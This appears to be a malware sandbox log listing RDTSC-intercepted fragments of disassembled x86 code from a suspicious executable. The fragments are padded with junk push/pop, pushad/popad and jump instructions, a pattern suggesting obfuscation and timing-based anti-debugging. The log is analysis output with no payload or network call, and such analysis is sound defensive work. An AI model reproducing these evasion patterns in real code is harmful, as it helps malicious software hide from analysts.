Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0416 second address: 6FE048E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B924h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA73B8FAB90h 0x0000000f pushad 0x00000010 call 00007FA6CD35B91Eh 0x00000015 mov si, 86A1h 0x00000019 pop eax 0x0000001a pushfd 0x0000001b jmp 00007FA6CD35B927h 0x00000020 or ax, 3F4Eh 0x00000025 jmp 00007FA6CD35B929h 0x0000002a popfd 0x0000002b popad 0x0000002c sub eax, eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FA6CD35B91Ah 0x00000035 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE048E second address: 6FE0494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0494 second address: 6FE0498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0498 second address: 6FE04A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi], edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ecx, edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE04A7 second address: 6FE051D instructions: 0x00000000 rdtsc 0x00000002 mov cx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FA6CD35B91Dh 0x0000000d or esi, 35262CE6h 0x00000013 jmp 00007FA6CD35B921h 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [esi+04h], eax 0x0000001d pushad 0x0000001e mov di, cx 0x00000021 mov ebx, esi 0x00000023 popad 0x00000024 mov dword ptr [esi+08h], eax 0x00000027 jmp 00007FA6CD35B922h 0x0000002c mov dword ptr [esi+0Ch], eax 0x0000002f pushad 0x00000030 push eax 0x00000031 mov edx, 0F6561D0h 0x00000036 pop ebx 0x00000037 movzx eax, bx 0x0000003a popad 0x0000003b mov eax, dword ptr [ebx+4Ch] 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FA6CD35B923h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE051D second address: 6FE053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE053A second address: 6FE0540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0540 second address: 6FE0544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0544 second address: 6FE0587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b jmp 00007FA6CD35B91Fh 0x00000010 mov eax, dword ptr [ebx+50h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FA6CD35B91Bh 0x0000001c jmp 00007FA6CD35B923h 0x00000021 popfd 0x00000022 push eax 0x00000023 pop ebx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0587 second address: 6FE05D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA6CC859ECBh 0x00000009 xor ax, 6A4Eh 0x0000000e jmp 00007FA6CC859ED9h 0x00000013 popfd 0x00000014 jmp 00007FA6CC859ED0h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esi+14h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ebx, 1702B6E0h 0x00000027 mov ax, di 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE05D7 second address: 6FE05DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE05DD second address: 6FE05E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE05E1 second address: 6FE0666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+54h] 0x0000000b jmp 00007FA6CD35B928h 0x00000010 mov dword ptr [esi+18h], eax 0x00000013 pushad 0x00000014 movzx eax, dx 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b popad 0x0000001c mov eax, dword ptr [ebx+58h] 0x0000001f jmp 00007FA6CD35B91Bh 0x00000024 mov dword ptr [esi+1Ch], eax 0x00000027 jmp 00007FA6CD35B926h 0x0000002c mov eax, dword ptr [ebx+5Ch] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FA6CD35B928h 0x00000038 adc cl, 00000048h 0x0000003b jmp 00007FA6CD35B91Bh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0666 second address: 6FE068D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+20h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ax, E7F9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE068D second address: 6FE06BA instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007FA6CD35B91Bh 0x0000000c popad 0x0000000d mov eax, dword ptr [ebx+60h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA6CD35B925h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE06BA second address: 6FE06C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE06C0 second address: 6FE06DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+24h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA6CD35B922h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE06DF second address: 6FE06F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6CC859ED1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE06F5 second address: 6FE073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+64h] 0x0000000a pushad 0x0000000b push eax 0x0000000c pop ecx 0x0000000d mov ch, dh 0x0000000f popad 0x00000010 mov dword ptr [esi+28h], eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FA6CD35B91Ah 0x0000001a add cx, 2C28h 0x0000001f jmp 00007FA6CD35B91Bh 0x00000024 popfd 0x00000025 mov edx, eax 0x00000027 popad 0x00000028 mov eax, dword ptr [ebx+68h] 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FA6CD35B91Ch 0x00000034 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE073B second address: 6FE073F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE073F second address: 6FE0745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0745 second address: 6FE074B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE074B second address: 6FE07CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B928h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+2Ch], eax 0x0000000e pushad 0x0000000f mov ecx, 6FFE4E3Dh 0x00000014 pushfd 0x00000015 jmp 00007FA6CD35B91Ah 0x0000001a add si, B418h 0x0000001f jmp 00007FA6CD35B91Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov ax, word ptr [ebx+6Ch] 0x0000002a jmp 00007FA6CD35B926h 0x0000002f mov word ptr [esi+30h], ax 0x00000033 jmp 00007FA6CD35B920h 0x00000038 mov ax, word ptr [ebx+00000088h] 0x0000003f pushad 0x00000040 mov dl, ah 0x00000042 push eax 0x00000043 push edx 0x00000044 mov si, dx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE07CC second address: 6FE07DC instructions: 0x00000000 rdtsc 0x00000002 mov dl, 38h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov word ptr [esi+32h], ax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE07DC second address: 6FE080E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA6CD35B91Fh 0x0000000a or cl, FFFFFF9Eh 0x0000000d jmp 00007FA6CD35B929h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE080E second address: 6FE081E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CC859ECCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE081E second address: 6FE0849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B91Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+0000008Ch] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA6CD35B920h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0849 second address: 6FE084F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE084F second address: 6FE08A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B91Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov cx, di 0x00000011 pop ebx 0x00000012 pushfd 0x00000013 jmp 00007FA6CD35B926h 0x00000018 and al, FFFFFF88h 0x0000001b jmp 00007FA6CD35B91Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [ebx+18h] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FA6CD35B920h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE08A8 second address: 6FE08B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE08B7 second address: 6FE090A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA6CD35B91Ch 0x00000013 sub cl, 00000078h 0x00000016 jmp 00007FA6CD35B91Bh 0x0000001b popfd 0x0000001c mov ah, B0h 0x0000001e popad 0x0000001f mov eax, dword ptr [ebx+1Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jmp 00007FA6CD35B91Ch 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE090A second address: 6FE0910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0910 second address: 6FE09E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B928h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+3Ch], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FA6CD35B91Eh 0x00000015 adc eax, 7E1D7D68h 0x0000001b jmp 00007FA6CD35B91Bh 0x00000020 popfd 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 jmp 00007FA6CD35B924h 0x00000029 popad 0x0000002a popad 0x0000002b mov eax, dword ptr [ebx+20h] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FA6CD35B91Eh 0x00000035 and eax, 53AEBAF8h 0x0000003b jmp 00007FA6CD35B91Bh 0x00000040 popfd 0x00000041 pushfd 0x00000042 jmp 00007FA6CD35B928h 0x00000047 xor esi, 76631558h 0x0000004d jmp 00007FA6CD35B91Bh 0x00000052 popfd 0x00000053 popad 0x00000054 mov dword ptr [esi+40h], eax 0x00000057 jmp 00007FA6CD35B926h 0x0000005c lea eax, dword ptr [ebx+00000080h] 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE09E2 second address: 6FE09E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE09E6 second address: 6FE09EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE09EC second address: 6FE0A4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c mov ebx, eax 0x0000000e mov esi, 422228A9h 0x00000013 popad 0x00000014 nop 0x00000015 pushad 0x00000016 mov cx, 43E1h 0x0000001a mov ecx, 1B813D1Dh 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov al, D1h 0x00000026 pushfd 0x00000027 jmp 00007FA6CC859ED1h 0x0000002c and si, 1E66h 0x00000031 jmp 00007FA6CC859ED1h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0A4B second address: 6FE0A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CD35B91Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0A5B second address: 6FE0AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a jmp 00007FA6CC859ECDh 0x0000000f jmp 00007FA6CC859ED0h 0x00000014 popad 0x00000015 lea eax, dword ptr [ebp-10h] 0x00000018 jmp 00007FA6CC859ED0h 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA6CC859ECAh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0AA5 second address: 6FE0AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0AA9 second address: 6FE0AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0AF1 second address: 6FE0B0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B91Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA6CD35B91Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0B0F second address: 6FE0B15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0B15 second address: 6FE0B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CD35B91Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0B26 second address: 6FE0B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0B2A second address: 6FE0B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FA73B8FA4A7h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0B3E second address: 6FE0B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0B42 second address: 6FE0B48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0B48 second address: 6FE0BFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA6CC859ED7h 0x00000009 jmp 00007FA6CC859ED3h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007FA6CC859ED8h 0x00000015 or ax, 8108h 0x0000001a jmp 00007FA6CC859ECBh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 mov eax, dword ptr [ebp-0Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FA6CC859ECBh 0x0000002f sub cx, 414Eh 0x00000034 jmp 00007FA6CC859ED9h 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007FA6CC859ED0h 0x00000040 jmp 00007FA6CC859ED5h 0x00000045 popfd 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0BFD second address: 6FE0C4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6CD35B927h 0x00000008 pushfd 0x00000009 jmp 00007FA6CD35B928h 0x0000000e xor eax, 484B2A88h 0x00000014 jmp 00007FA6CD35B91Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esi+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0C4D second address: 6FE0C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CC859ED1h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0C63 second address: 6FE0C69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0C69 second address: 6FE0C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0C6D second address: 6FE0C92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B923h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov di, BB06h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0C92 second address: 6FE0C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0C97 second address: 6FE0D0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 pushfd 0x00000007 jmp 00007FA6CD35B925h 0x0000000c add ah, 00000066h 0x0000000f jmp 00007FA6CD35B921h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push 00000001h 0x0000001a pushad 0x0000001b mov cl, 03h 0x0000001d pushfd 0x0000001e jmp 00007FA6CD35B929h 0x00000023 jmp 00007FA6CD35B91Bh 0x00000028 popfd 0x00000029 popad 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FA6CD35B925h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0D0F second address: 6FE0D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CC859ECCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0D1F second address: 6FE0D84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B91Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dx, BE6Ah 0x00000011 mov ax, dx 0x00000014 popad 0x00000015 nop 0x00000016 jmp 00007FA6CD35B91Dh 0x0000001b lea eax, dword ptr [ebp-08h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FA6CD35B923h 0x00000027 sub si, 346Eh 0x0000002c jmp 00007FA6CD35B929h 0x00000031 popfd 0x00000032 mov ah, 01h 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0DFA second address: 6FE0E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0E00 second address: 6FE0EC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a jmp 00007FA6CD35B928h 0x0000000f js 00007FA73B8FA1ADh 0x00000015 pushad 0x00000016 mov cx, 672Dh 0x0000001a mov bx, cx 0x0000001d popad 0x0000001e mov eax, dword ptr [ebp-04h] 0x00000021 pushad 0x00000022 mov dl, al 0x00000024 pushad 0x00000025 mov di, 9BE0h 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c popad 0x0000002d mov dword ptr [esi+08h], eax 0x00000030 jmp 00007FA6CD35B925h 0x00000035 lea eax, dword ptr [ebx+70h] 0x00000038 pushad 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FA6CD35B91Ah 0x00000040 sbb cx, 6158h 0x00000045 jmp 00007FA6CD35B91Bh 0x0000004a popfd 0x0000004b mov edx, eax 0x0000004d popad 0x0000004e pushfd 0x0000004f jmp 00007FA6CD35B924h 0x00000054 and cx, 6BB8h 0x00000059 jmp 00007FA6CD35B91Bh 0x0000005e popfd 0x0000005f popad 0x00000060 push 00000001h 0x00000062 jmp 00007FA6CD35B926h 0x00000067 nop 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0EC1 second address: 6FE0EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0EC5 second address: 6FE0ED2 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov eax, 70E913EBh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0ED2 second address: 6FE0F97 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA6CC859ED0h 0x00000008 xor eax, 75449078h 0x0000000e jmp 00007FA6CC859ECBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FA6CC859ECFh 0x0000001f xor eax, 318F403Eh 0x00000025 jmp 00007FA6CC859ED9h 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007FA6CC859ED0h 0x00000031 and eax, 7DBB7538h 0x00000037 jmp 00007FA6CC859ECBh 0x0000003c popfd 0x0000003d popad 0x0000003e nop 0x0000003f pushad 0x00000040 mov di, cx 0x00000043 push eax 0x00000044 pushfd 0x00000045 jmp 00007FA6CC859ED7h 0x0000004a sbb ax, 7FAEh 0x0000004f jmp 00007FA6CC859ED9h 0x00000054 popfd 0x00000055 pop esi 0x00000056 popad 0x00000057 lea eax, dword ptr [ebp-18h] 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push edi 0x0000005e pop eax 0x0000005f rdtsc
